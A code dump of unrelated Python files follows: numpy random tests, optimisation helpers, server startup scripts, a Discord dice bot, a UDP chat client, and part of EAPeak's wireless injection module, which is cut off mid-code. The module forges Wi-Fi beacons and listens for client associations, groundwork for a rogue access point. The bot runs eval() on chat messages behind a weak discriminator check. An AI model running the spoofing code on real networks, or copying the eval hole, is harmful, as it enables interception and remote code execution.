hypergeom, ngood, bad_nbad, nsample * 3) assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3) assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3) assert_raises(ValueError, hypergeom, -1, 10, 20) assert_raises(ValueError, hypergeom, 10, -1, 20) assert_raises(ValueError, hypergeom, 10, 10, -1) assert_raises(ValueError, hypergeom, 10, 10, 25) # ValueError for arguments that are too big. assert_raises(ValueError, hypergeom, 2**30, 10, 20) assert_raises(ValueError, hypergeom, 999, 2**31, 50) assert_raises(ValueError, hypergeom, 999, [2**29, 2**30], 1000) def test_logseries(self): p = [0.5] bad_p_one = [2] bad_p_two = [-1] desired = np.array([1, 1, 1]) random = Generator(MT19937(self.seed)) logseries = random.logseries actual = logseries(p * 3) assert_array_equal(actual, desired) assert_raises(ValueError, logseries, bad_p_one * 3) assert_raises(ValueError, logseries, bad_p_two * 3) def test_multinomial(self): random = Generator(MT19937(self.seed)) actual = random.multinomial([5, 20], [1 / 6.] * 6, size=(3, 2)) desired = np.array([[[0, 0, 2, 1, 2, 0], [2, 3, 6, 4, 2, 3]], [[1, 0, 1, 0, 2, 1], [7, 2, 2, 1, 4, 4]], [[0, 2, 0, 1, 2, 0], [3, 2, 3, 3, 4, 5]]], dtype=np.int64) assert_array_equal(actual, desired) random = Generator(MT19937(self.seed)) actual = random.multinomial([5, 20], [1 / 6.] * 6) desired = np.array([[0, 0, 2, 1, 2, 0], [2, 3, 6, 4, 2, 3]], dtype=np.int64) assert_array_equal(actual, desired) class TestThread: # make sure each state produces the same sequence even in threads def setup(self): self.seeds = range(4) def check_function(self, function, sz): from threading import Thread out1 = np.empty((len(self.seeds),) + sz) out2 = np.empty((len(self.seeds),) + sz) # threaded generation t = [Thread(target=function, args=(Generator(MT19937(s)), o)) for s, o in zip(self.seeds, out1)] [x.start() for x in t] [x.join() for x in t] # the same serial for s, o in zip(self.seeds, out2): function(Generator(MT19937(s)), o) # these platforms change x87 fpu precision mode in threads if np.intp().dtype.itemsize == 4 and sys.platform == "win32": assert_array_almost_equal(out1, out2) else: assert_array_equal(out1, out2) def test_normal(self): def gen_random(state, out): out[...] = state.normal(size=10000) self.check_function(gen_random, sz=(10000,)) def test_exp(self): def gen_random(state, out): out[...] = state.exponential(scale=np.ones((100, 1000))) self.check_function(gen_random, sz=(100, 1000)) def test_multinomial(self): def gen_random(state, out): out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000) self.check_function(gen_random, sz=(10000, 6)) # See Issue #4263 class TestSingleEltArrayInput: def setup(self): self.argOne = np.array([2]) self.argTwo = np.array([3]) self.argThree = np.array([4]) self.tgtShape = (1,) def test_one_arg_funcs(self): funcs = (random.exponential, random.standard_gamma, random.chisquare, random.standard_t, random.pareto, random.weibull, random.power, random.rayleigh, random.poisson, random.zipf, random.geometric, random.logseries) probfuncs = (random.geometric, random.logseries) for func in funcs: if func in probfuncs: # p < 1.0 out = func(np.array([0.5])) else: out = func(self.argOne) assert_equal(out.shape, self.tgtShape) def test_two_arg_funcs(self): funcs = (random.uniform, random.normal, random.beta, random.gamma, random.f, random.noncentral_chisquare, random.vonmises, random.laplace, random.gumbel, random.logistic, random.lognormal, random.wald, random.binomial, random.negative_binomial) probfuncs = (random.binomial, random.negative_binomial) for func in funcs: if func in probfuncs: # p <= 1 argTwo = np.array([0.5]) else: argTwo = self.argTwo out = func(self.argOne, argTwo) assert_equal(out.shape, self.tgtShape) out = func(self.argOne[0], argTwo) assert_equal(out.shape, self.tgtShape) out = func(self.argOne, argTwo[0]) assert_equal(out.shape, self.tgtShape) def test_integers(self, endpoint): itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16, np.int32, np.uint32, np.int64, np.uint64] func = random.integers high = np.array([1]) low = np.array([0]) for dt in itype: out = func(low, high, endpoint=endpoint, dtype=dt) assert_equal(out.shape, self.tgtShape) out = func(low[0], high, endpoint=endpoint, dtype=dt) assert_equal(out.shape, self.tgtShape) out = func(low, high[0], endpoint=endpoint, dtype=dt) assert_equal(out.shape, self.tgtShape) def test_three_arg_funcs(self): funcs = [random.noncentral_f, random.triangular, random.hypergeometric] for func in funcs: out = func(self.argOne, self.argTwo, self.argThree) assert_equal(out.shape, self.tgtShape) out = func(self.argOne[0], self.argTwo, self.argThree) assert_equal(out.shape, self.tgtShape) out = func(self.argOne, self.argTwo[0], self.argThree) assert_equal(out.shape, self.tgtShape) @pytest.mark.parametrize("config", JUMP_TEST_DATA) def test_jumped(config): # Each config contains the initial seed, a number of raw steps # the sha256 hashes of the initial and the final states' keys and # the position of of the initial and the final state. # These were produced using the original C implementation. seed = config["seed"] steps = config["steps"] mt19937 = MT19937(seed) # Burn step mt19937.random_raw(steps) key = mt19937.state["state"]["key"] if sys.byteorder == 'big': key = key.byteswap() sha256 = hashlib.sha256(key) assert mt19937.state["state"]["pos"] == config["initial"]["pos"] assert sha256.hexdigest() == config["initial"]["key_sha256"] jumped = mt19937.jumped() key = jumped.state["state"]["key"] if sys.byteorder == 'big': key = key.byteswap() sha256 = hashlib.sha256(key) assert jumped.state["state"]["pos"] == config["jumped"]["pos"] assert sha256.hexdigest() == config["jumped"]["key_sha256"] def test_broadcast_size_error(): mu = np.ones(3) sigma = np.ones((4, 3)) size = (10, 4, 2) assert random.normal(mu, sigma, size=(5, 4, 3)).shape == (5, 4, 3) with pytest.raises(ValueError): random.normal(mu, sigma, size=size) with pytest.raises(ValueError): random.normal(mu, sigma, size=(1, 3)) with pytest.raises(ValueError): random.normal(mu, sigma, size=(4, 1, 1)) # 1 arg shape = np.ones((4, 3)) with pytest.raises(ValueError): random.standard_gamma(shape, size=size) with pytest.raises(ValueError): random.standard_gamma(shape, size=(3,)) with pytest.raises(ValueError): random.standard_gamma(shape, size=3) # Check out out = np.empty(size) with pytest.raises(ValueError): random.standard_gamma(shape, out=out) # 2 arg with pytest.raises(ValueError): random.binomial(1, [0.3, 0.7], size=(2, 1)) with pytest.raises(ValueError): random.binomial([1, 2], 0.3, size=(2, 1)) with pytest.raises(ValueError): random.binomial([1, 2], [0.3, 0.7], size=(2, 1)) with pytest.raises(ValueError): random.multinomial([2, 2], [.3, .7], size=(2, 1)) # 3 arg a = random.chisquare(5, size=3) b = random.chisquare(5, size=(4, 3)) c = random.chisquare(5, size=(5, 4, 3)) assert random.noncentral_f(a, b, c).shape == (5, 4, 3) with pytest.raises(ValueError, match=r"Output size \(6, 5, 1, 1\) is"): random.noncentral_f(a, b, c, size=(6, 5, 1, 1)) def test_broadcast_size_scalar(): mu = np.ones(3) sigma = np.ones(3) random.normal(mu, sigma, size=3) with pytest.raises(ValueError): random.normal(mu, sigma, size=2)
utils.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import threading import operator from random import random, randint, gauss, shuffle, choice from math import exp from scipy.spatial.distance import euclidean import numpy as np import numba as nb # class GOThread(threading.Thread): # def __init__(self, target, *args, **kwargs): # self.target = operator.methodcaller(target) if isinstance(target, str) else target # super(GOThread, self).__init__(target=target, *args, **kwargs) # def parallel(func, individuals, *args, **kwargs): # threads = [GOThread(target=func, args=(individual,)+args, kwargs=kwargs) for individual in individuals] # for thread in threads: # thread.start() # for thread in threads: # thread.join() # return [thread.result for thread in threads] def binary_select(a, b, p=0.5): if random() < p: return a else: return b from scipy.special import softmax from scipy.stats import rv_discrete def boltzmann_select(xs, fs, T=1): L = len(xs) ps = softmax(np.array(fs) /T) rv = rv_discrete(values=(np.arange(L), ps)) k = rv.rvs() return xs[k] def choice_with_prob(xs, ps, n=1): L = len(xs) ps /= np.sum(ps) X = np.arange(L) ks = [] for _ in range(n): rv = rv_discrete(values=(np.arange(L), ps)) k = rv.rvs() ks.append(X[k]) X = np.delete(X, k) ps = np.delete(ps, k) ps /= np.sum(ps) L -= 1 return [xs[k] for k in ks] def choice_with_prob_replace(xs, ps, n=1): L = len(xs) ps /= np.sum(ps) rv = rv_discrete(values=(np.arange(L), ps)) ks = rv.rvs(size=n) return [xs[k] for k in ks] from toolz import unique def choice_with_prob_unique(xs, ps, n=1): L = len(xs) ps /= np.sum(ps) rv = rv_discrete(values=(np.arange(L), ps)) ks = unique(rv.rvs(size=n)) return [xs[k] for k in ks] def choice_with_fitness(xs, fs=None, n=1, T=1): if fs is None: fs = [x.fitness for x in xs] ps = softmax(np.array(fs) /T) return choice_with_prob(xs, ps, n=1) def choice_uniform(xs, n=1): L = len(xs) ks = np.random.choice(L, n) return [xs[k] for k in ks] def randint2(lb=0, ub=9, ordered=False): """Select two different numbers in [lb, ub] randomly Formally i != j ~ U(lb, ub) Applied in GA operations. Keyword Arguments: lb {number} -- lower bound of interval (default: {0}) ub {number} -- upper bound of interval (default: {9}) Returns: two numbers """ i = randint(lb, ub) d = ub - lb j = randint(i+1, d+i) if j > ub: j -= (d + 1) if ordered: if j < i: return j, i return i, j @nb.vectorize() def max0(x): return 0 if x<=0 else x def max_lb(lb): @nb.vectorize() def m(x): return lb if x<=lb else x return m @nb.vectorize() def hl(x): return 0 if x<=0 else (1 if x>=1 else x) def metropolis_rule(D, T, epsilon=0.000001): if D < 0: p = exp(D/max(T, epsilon)) return random() < p else: return True def proportion(n): if n is None: n = D elif 0 < n < 1: n = int(N * n)
wsgi.py
""" Start Application Sequence: 1) bind sockets for flask to bokeh communications 2) start bokeh server (Tornado) running bokeh bkapp 3) start flask server (Tornado) running flask app """ import time import logging from threading import Thread from server.app import start_tornado from server.bkapp import ( bk_worker, get_sockets ) from server.config import ( BOKEH_URL, FLASK_URL ) logging.basicConfig(level=logging.INFO) log = logging.getLogger(__name__) t2 = Thread(target=start_tornado, daemon=True) t2.start() # get sockets, so bkapp and app can talk bk_sockets, bk_port = get_sockets() # start bokeh sever t1 = Thread(target=bk_worker, args=[bk_sockets, bk_port], daemon=True) t1.start() bokeh_url = BOKEH_URL.replace('$PORT', str(bk_port)) log.info("Bokeh Server App Running at: %s", bokeh_url) # start flask server log.info("Flask + Bokeh Server App Running at: %s", FLASK_URL) # loop for ever while True: time.sleep(0.05)
shell.py
""" Scrapy Shell See documentation in docs/topics/shell.rst """ from threading import Thread from scrapy.command import ScrapyCommand from scrapy.shell import Shell class Command(ScrapyCommand): requires_project = False default_settings = {'KEEP_ALIVE': True, 'LOGSTATS_INTERVAL': 0} def syntax(self): return "[url|file]" def short_desc(self): return "Interactive scraping console" def long_desc(self): return "Interactive console for scraping the given url" def add_options(self, parser): ScrapyCommand.add_options(self, parser) parser.add_option("-c", dest="code", help="evaluate the code in the shell, print the result and exit") parser.add_option("--spider", dest="spider", help="use this spider") def update_vars(self, vars): """You can use this function to update the Scrapy objects that will be available in the shell """ pass def run(self, args, opts): crawler = self.crawler_process.create_crawler() url = args[0] if args else None spider = crawler.spiders.create(opts.spider) if opts.spider else None self.crawler_process.start_crawling() self._start_crawler_thread() shell = Shell(crawler, update_vars=self.update_vars, code=opts.code) shell.start(url=url, spider=spider) def _start_crawler_thread(self): t = Thread(target=self.crawler_process.start_reactor) t.daemon = True t.start()
tymora.py
#!/usr/bin/env python3 import discord import asyncio import sys from concurrent.futures import ProcessPoolExecutor from multiprocessing import Process, Pipe from complex_dice import * from deck_of_many_things import * HELP_STR = """ Hi, I'm Tymora! I evaluate complex dice expressions that have absolutely no use whatsoever! These complex expressions are built out of numbers and operators, like mathematical expressions. **The `.roll` Command** General rules: - Operators are infix, and are evaluated in decreasing order of precedence. - If an operator gets a list where it expects a number, it uses the sum of the list. - If an operator gets a number where it expects a list, it treats the number as a single-element list. Operators: In these descriptions, `a` refers to the left argument, and `b` refers to the right argument. - `d`: Rolls `a` `b`-sided dice, and returns the sum. Precedence 4. - `r`: Rerolls any `b`s in `a`, once. Precedence 3. - `R`: Rerolls any `b`s in `a`, repeatedly, until no `b`s remain. Precedence 3. - `t`: Takes the `b` lowest values from `a`. Precedence 3. - `T`: Takes the `b` highest values from `a`. Precedence 3. - `*`: Multiplies `a` and `b`. Precedence 2. - `/`: Divides `a` by `b`, flooring the result. Precedence 2. - `+`: Adds `a` and `b`. Precedence 1. - `-`: Subtracts `b` from `a`. Precedence 1. - `.`: Concatenates `a` and `b`. Precedence 1. - `_`: Removes all elements in `b` from `a`. Precedence 1. - `?`: Evaluates `b` if `a` is greater than 0, else returns 0. Precedence 0. **Other Commands** - `.count`: rolls a simple dice expression (`adb`), and counts how many of each number you get. - `.help`: Sends you this help text in a DM. - `.draw <ID>`: Draws a card from a Deck of Many Things with the specified ID. - `.initdeck <ID> <1|0>: Initializes a Deck of Many Things with the specified ID.""" + \ """ The second argument is 1 if a 22-card deck is to be used; otherwise 0.""" ZALGO_STR=\ "Ḣ̥̪̗͙͚͉͓͔̎ͯ̃ͫͨͫ͜͠ͅẼ̖̼͍̞̘̠̫͛ ̳̤͗͛͆̉̈́̆̈͝C͚̱̮̘̆͂̌ͧŎ̧̟̞̩̳̝̘̯̂̂̀͐̆̏͞M̨̼͙̫̿͐̒̀̓̿ͅE͗̆͗͆̽͏͏̖̜̱͍̝̙ͅS͙̯͍̩̱̪̞ͦͣͫ͌̍ͦͤ͠ͅ" GAME_STR = "1dbutter | .help" MASTER = "YOUR DISCORD DISCRIMINATOR HERE" banned_users = [] COMMAND_TIMEOUT = 5 MAX_MESSAGE_LENGTH = 2000 client = discord.Client() executor = ProcessPoolExecutor() def run_command(*args, **kwargs): fn = kwargs.pop('fn') conn = kwargs.pop('conn') conn.send(fn(*args, **kwargs)) conn.close() def do_command(fn, *args, **kwargs): parent_conn, child_conn = Pipe() kwargs['conn'] = child_conn kwargs['fn'] = fn p = Process(target=run_command, args=args, kwargs=kwargs) p.start() p.join(COMMAND_TIMEOUT) if p.is_alive(): p.terminate() return "Request timed out" else: try: return parent_conn.recv() except: return "Error running command" async def invoke_command(fn, *args, **kwargs): global executor result = executor.submit(do_command, fn, *args, **kwargs).result() return result @client.event async def on_ready(): print('Logged in as') print(client.user.name) print(client.user.id) print('------') load_decks() await client.change_presence(game=discord.Game(name=GAME_STR)) @client.event async def on_message(message): if str(message.author.discriminator) in banned_users: return elif message.content.startswith('.roll'): dice_str = message.content[6:] if dice_str == '0d0': await client.send_message(message.channel, "{} {}".format(message.author.mention, ZALGO_STR)) else: result = await invoke_command(evaluate_dice, dice_str) if result is None: return response = "{} Result: {}".format(message.author.mention, result) if len(response) < MAX_MESSAGE_LENGTH: await client.send_message(message.channel, response) else: await client.send_message(message.channel, "{} Response too long".format(message.author.mention)) elif message.content.startswith('.count'): dice_str = message.content[7:] if dice_str == '0d0': await client.send_message(message.channel, "{} {}".format(message.author.mention, ZALGO_STR)) else: result = await invoke_command(roll_count, *map(int, dice_str.split('d'))) response = "{} Result: {}".format(message.author.mention, result) if len(response) < MAX_MESSAGE_LENGTH: await client.send_message(message.channel, response) else: await client.send_message(message.channel, "{} Response too long".format(message.author.mention)) elif message.content.startswith('.eval'): if str(message.author.discriminator) == MASTER: await client.send_message(message.channel, "{} {}".format( message.author.mention, eval(message.content[6:])) ) else: await client.send_message(message.channel, "{} You're not the boss of me!".format(message.author.mention)) elif message.content.startswith('.setgame'): if str(message.author.discriminator) == MASTER: await client.change_presence(game=discord.Game(name=message.content[9:])) else: await client.send_message(message.channel, "{} You're not the boss of me!".format(message.author.mention)) elif message.content.startswith('.help'): await client.send_message(message.author, HELP_STR) elif message.content.startswith('.init'): deck_id, use_22 = message.content.split()[1:3] use_22 = int(use_22) init_deck(deck_id, use_22) await client.send_message(message.channel, "{} {}-card deck with ID {} initialized.".format( message.author.mention, 22 if use_22 else 13, deck_id) ) elif message.content.startswith('.draw'): deck_id = message.content.split()[1] card = draw(deck_id) await client.send_message(message.channel, "{} Your card is: {}".format(message.author.mention, card)) elif message.content.startswith('.butter'): await client.send_message(message.channel, "{} https://i.imgur.com/lue3ZfD.png".format(message.author.mention)) def main(client_secret, master): global client, MASTER MASTER = master client.run(client_secret) if __name__ == '__main__': if len(sys.argv) < 3: print("Usage: tymora <client secret> <master discriminator>") main(sys.argv[1], sys.argv[2])
udp_c_chatroom.py
""" author: Lewizo email: 615905244@qq.com env: Python3.8 socket udp & tcp & multiprocessing """ from socket import * from multiprocessing import * # import chatroom_ui import sys def menu(us): print(''' =============== 聊天室菜单 =============== 1 登录 2 注册账号 3 更改账号昵称 4 修改密码 5 更改头像(暂未开放) 6 上传共享文件 7 下载共享文件 8 查看共享文件 9 在线词典 0 退出聊天室 ======================================== ''') while True: select = input("请选择 >>") if select == "1": name = log_in(us) return name if select == "2": regist(us) if select == "3": change_name(us) if select == "4": pass # change_password(us) if select == "5": pass # change_image(us) if select == "6": put_file() if select == "7": get_file() if select == "8": look_file() if select == "9": find_word() if select == "0": sys.exit("退出") def log_in(us): while True: name = input("输入昵称:") password = input("输入密码:") msg = "L " + name + " " + password us.sendto(msg.encode(), ('127.0.0.1', 2048)) data, addr = us.recvfrom(1024) print(data.decode()) if data.decode() == "进入聊天室": return name def regist(us): while True: name = input("输入昵称:") password = input("输入密码:") msg = "R " + name + " " + password us.sendto(msg.encode(), ('127.0.0.1', 2048)) data, addr = us.recvfrom(1024) print(data.decode(), end="") if data.decode() == "创建成功!": break def change_name(us): while True: name = input("输入需要修改的昵称:") password = input("输入密码:") newname = input("输入新的昵称:") msg = "E " + name + " " + password + " " + newname us.sendto(msg.encode(), ('127.0.0.1', 2048)) data, addr = us.recvfrom(1024) print(data.decode(), end="") if data.decode() == "修改成功": break def send_message(name, us): while True: try: word = input(name + ">>") except KeyboardInterrupt: word = "exit" if word == "exit": msg = "Q " + name us.sendto(msg.encode(), ('127.0.0.1', 2048)) sys.exit("退出聊天室") msg = "C " + name + " " + word us.sendto(msg.encode(), ('127.0.0.1', 2048)) def get_message(name, us): while True: data, addr = us.recvfrom(1024) print("\n" + data.decode() + "\n" + name + ">>", end="") def put_file(): ts = socket() ts.connect(('localhost', 2048)) name = input("输入要上传的文件名称:") msg = "P " + name ts.send(msg.encode()) f = open('/home/lewizo/PycharmProjects/chatroom/client/' + name, 'rb') while True: data = f.read(1024) if not data: print("上传完毕") ts.send("# ".encode()) break ts.send(data) f.close() ts.close() def get_file(): ts = socket() ts.connect(('localhost', 2048)) name = input("输入要下载的文件名称:") msg = "G " + name ts.send(msg.encode()) f = open('/home/lewizo/PycharmProjects/chatroom/client/' + name, 'wb') while True: data = ts.recv(1024) if data == "上传完毕".encode(): print(data.decode()) break f.write(data) f.close() ts.close() def look_file(): ts = socket() ts.connect(('localhost', 2048)) ts.send("L ".encode()) list_file = ts.recv(1024) print(list_file.decode()) def find_word(): ts = socket() ts.connect(('localhost', 2048)) while True: try: word = input("输入单词:") except KeyboardInterrupt: ts.send("w exit".encode()) break if word == "exit": ts.send("w exit".encode()) break msg = "W " + word ts.send(msg.encode()) mean = ts.recv(1024) print(mean.decode()) def main(): us = socket(AF_INET, SOCK_DGRAM) name = menu(us) p_get = Process(target=get_message, args=(name, us), daemon=True) p_get.start() send_message(name, us) us.close() if __name__ == '__main__': main()
inject.py
#!/usr/bin/env python # -*- coding: utf-8 -*- # # lib/eapeak/inject.py # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of the project nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # import Queue from random import randint from struct import pack, unpack import threading import time # external imports from scapy.layers.dot11 import RadioTap, Dot11, Dot11Beacon, Dot11Elt, Dot11Auth, Dot11AssoReq, Dot11AssoResp, Dot11ProbeReq, Dot11Disas, Dot11QoS, Dot11ProbeResp from scapy.layers.eap import EAPOL from scapy.layers.l2 import LLC, SNAP from scapy.sendrecv import sniff, sendp # project imports from eapeak.common import get_bssid, get_source, get_destination, __version__ from eapeak.parse import parse_rsn_data, build_rsn_data from eapeak.scapylayers.l2 import LEAP, PEAP, EAP # pylint: disable=unused-import from ipfunc import getHwAddr RESPONSE_TIMEOUT = 1.5 # Time to wait for a response PRIVACY_NONE = 0 PRIVACY_WEP = 1 PRIVACY_WPA = 2 EAP_MAX_TRIES = 3 GOOD = '\033[1;32m[+]\033[1;m ' STATUS = '\033[1;34m[*]\033[1;m ' ERROR = '\033[1;31m[-]\033[1;m ' class SSIDBroadcaster(threading.Thread): """ This object is a thread-friendly SSID broadcaster It's meant to be controlled by the Wireless State Machine """ def __init__(self, interface, essid, bssid=None): threading.Thread.__init__(self) self.interface = interface self.essid = essid if not bssid: bssid = getHwAddr(interface) self.bssid = bssid.lower() self.broadcast_interval = 0.15 self.channel = "\x06" self.set_privacy(PRIVACY_NONE) self.sequence = randint(1200, 2000) self.__shutdown__ = False def __fixSC__(self, fragment=0): """ This is a reserved method to return the sequence number in a way that is not skewed by a bug in how the SC field is packed in Scapy. """ if self.sequence >= 0xFFF: self.sequence = 1 else: self.sequence += 1 SC = (self.sequence - ((self.sequence >> 4) << 4) << 12) + (fragment << 8) + (self.sequence >> 4) return unpack('<H', pack('>H', SC))[0] def run(self): """ This is the thread routine that broadcasts the SSID. """ while not self.__shutdown__: self.beacon.getlayer(Dot11).SC = self.__fixSC__() sendp(self.beacon, iface=self.interface, verbose=False) time.sleep(self.broadcast_interval) def set_privacy(self, value): """ Configure the privacy settings for None, WEP, and WPA """ if value == PRIVACY_NONE: self.beacon = ( RadioTap()/ Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/ Dot11Beacon(cap='ESS+short-preamble+short-slot')/ Dot11Elt(ID="SSID", info=self.essid)/ Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/ Dot11Elt(ID="DSset", info=self.channel)/ Dot11Elt(ID=42, info="\x04")/ Dot11Elt(ID=47, info="\x04")/ Dot11Elt(ID=50, info="\x0c\x12\x18\x60") ) elif value == PRIVACY_WEP: self.beacon = ( RadioTap()/ Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/ Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/ Dot11Elt(ID="SSID", info=self.essid)/ Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/ Dot11Elt(ID="DSset", info=self.channel)/ Dot11Elt(ID=42, info="\x04")/ Dot11Elt(ID=47, info="\x04")/ Dot11Elt(ID=50, info="\x0c\x12\x18\x60") ) elif value == PRIVACY_WPA: self.beacon = ( RadioTap()/ Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/ Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/ Dot11Elt(ID="SSID", info=self.essid)/ Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/ Dot11Elt(ID="DSset", info=self.channel)/ Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/ Dot11Elt(ID=42, info="\x00")/ Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/ Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00") ) def send_beacon(self): """ Convenience function for sending beacons without starting a thread """ self.beacon.getlayer(Dot11).SC = self.__fixSC__() sendp(self.beacon, iface=self.interface, verbose=False) @staticmethod def send_beacon_ex(essid, interface, privacy=PRIVACY_NONE, bssid=None, channel=6): """ Convenience function for sending beacons without a thread or creating an instance """ if not bssid: bssid = getHwAddr(interface) channel = chr(channel) sequence = randint(1200, 2000) if privacy in [PRIVACY_NONE, 'none', 'NONE']: beacon = ( RadioTap()/ Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/ Dot11Beacon(cap='ESS+short-preamble+short-slot')/ Dot11Elt(ID="SSID", info=essid)/ Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/ Dot11Elt(ID="DSset", info=channel)/ Dot11Elt(ID=42, info="\x04")/ Dot11Elt(ID=47, info="\x04")/ Dot11Elt(ID=50, info="\x0c\x12\x18\x60") ) elif privacy in [PRIVACY_WEP, 'wep', 'WEP']: beacon = ( RadioTap()/ Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/ Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/ Dot11Elt(ID="SSID", info=essid)/ Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/ Dot11Elt(ID="DSset", info=channel)/ Dot11Elt(ID=42, info="\x04")/ Dot11Elt(ID=47, info="\x04")/ Dot11Elt(ID=50, info="\x0c\x12\x18\x60") ) elif privacy in [PRIVACY_WPA, 'wpa', 'WPA']: beacon = ( RadioTap()/ Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=bssid, addr3=bssid, SC=sequence)/ Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/ Dot11Elt(ID="SSID", info=essid)/ Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/ Dot11Elt(ID="DSset", info=channel)/ Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/ Dot11Elt(ID=42, info="\x00")/ Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/ Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00") ) else: raise Exception('Invalid privacy setting') sendp(beacon, iface=interface, verbose=False) class ClientListener(threading.Thread): """ This object is a thread-friendly listener for Client connection attempts. The backlog corresponds to the size of the queue, if the queu is full because the items are not being handled fast enough then new association requests will be dropped and lost. """ def __init__(self, interface, backlog, essid=None, bssid=None): threading.Thread.__init__(self) self.interface = interface self.backlog = backlog self.essid = essid if not bssid: bssid = getHwAddr(interface) self.bssid = bssid.lower() self.lastpacket = None self.client_queue = Queue.Queue(self.backlog) self.channel = "\x06" self.sequence = randint(1200, 2000) self.__shutdown__ = False def __fixSC__(self, fragment=0): """ This is a reserved method to return the sequence number in a way that is not skewed by a bug in how the SC field is packed in Scapy. """ if self.sequence >= 0xFFF: self.sequence = 1 else: self.sequence += 1 SC = (self.sequence - ((self.sequence >> 4) << 4) << 12) + (fragment << 8) + (self.sequence >> 4) # bit shifts FTW! return unpack('<H', pack('>H', SC))[0] def __stopfilter__(self, packet): """ This is the stop filter for Scapy to be used to check if the packet was sent to EAPeak. """ if packet.haslayer(Dot11Auth) or packet.haslayer(Dot11AssoReq): if get_bssid(packet) == self.bssid and get_source(packet) != self.bssid: self.lastpacket = packet return True return False elif packet.haslayer(Dot11ProbeReq): self.lastpacket = packet return True return False def set_privacy(self, value): """ Configure the privacy settings for None, WEP, and WPA """ if value == PRIVACY_NONE: self.probe_response_template = ( RadioTap()/ Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/ Dot11ProbeResp(cap='ESS+privacy+short-preamble+short-slot')/ Dot11Elt(ID="SSID", info='')/ Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/ Dot11Elt(ID="DSset", info=self.channel)/ Dot11Elt(ID=42, info="\x04")/ Dot11Elt(ID=47, info="\x04")/ Dot11Elt(ID=50, info="\x0c\x12\x18\x60") ) elif value == PRIVACY_WEP: self.probe_response_template = ( RadioTap()/ Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/ Dot11ProbeResp(cap='ESS+short-preamble+short-slot')/ Dot11Elt(ID="SSID", info='')/ Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/ Dot11Elt(ID="DSset", info=self.channel)/ Dot11Elt(ID=42, info="\x04")/ Dot11Elt(ID=47, info="\x04")/ Dot11Elt(ID=50, info="\x0c\x12\x18\x60") ) elif value == PRIVACY_WPA: self.probe_response_template = ( RadioTap()/ Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/ Dot11ProbeResp(cap='ESS+privacy+short-preamble+short-slot')/ Dot11Elt(ID="SSID", info='')/ Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/ Dot11Elt(ID="DSset", info=self.channel)/ Dot11Elt(ID=221, 